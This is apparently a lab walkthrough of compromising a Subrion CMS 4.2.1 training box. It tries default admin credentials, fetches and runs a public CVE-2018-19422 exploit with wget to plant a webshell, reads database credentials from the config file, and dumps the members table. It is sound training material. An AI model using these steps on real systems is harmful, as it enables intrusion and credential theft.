Subrion CMS 4.2.1 can lead to authenticated file upload RCE when valid admin credentials are available.
Check robots.txt and the admin panel:
curl http://exfiltrated.offsec/robots.txt
curl http://exfiltrated.offsec/panel/Useful indicators from /panel/:
intelli.config.admin_url = 'http://exfiltrated.offsec/panel';
Powered by Subrion CMS v4.2.1
Try the default admin login:
Username: admin
Password: admin
Subrion CMS 4.2.1 has an authenticated file upload bypass to RCE path.
wget https://raw.githubusercontent.com/Swammers8/SubrionCMS-4.2.1-File-upload-RCE-auth-/refs/heads/main/exploit.py
python3 exploit.py -u http://exfiltrated.offsec/panel -l admin -p adminSuccessful output should show login and webshell upload:
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Login Successful!
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/RANDOM.phar
The shell lands as the web user:
whoami
# www-data
id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
# /var/www/html/subrion/uploadsCheck the Subrion config for local database credentials:
cat /var/www/html/subrion/includes/config.inc.phpUseful values:
define('INTELLI_CONNECT', 'mysqli');
define('INTELLI_DBHOST', 'localhost');
define('INTELLI_DBUSER', 'subrionuser');
define('INTELLI_DBPASS', 'target100');
define('INTELLI_DBNAME', 'subrion');
define('INTELLI_DBPORT', '3306');
define('INTELLI_DBPREFIX', 'sbr421_');Enumerate the database:
mysql -u subrionuser -h localhost -p
# password: target100
use subrion;
show tables;
select * from sbr421_members\GThe admin account may confirm the web login path:
username: admin
email: admin@exfiltrated.offsec
status: active
fullname: Administrator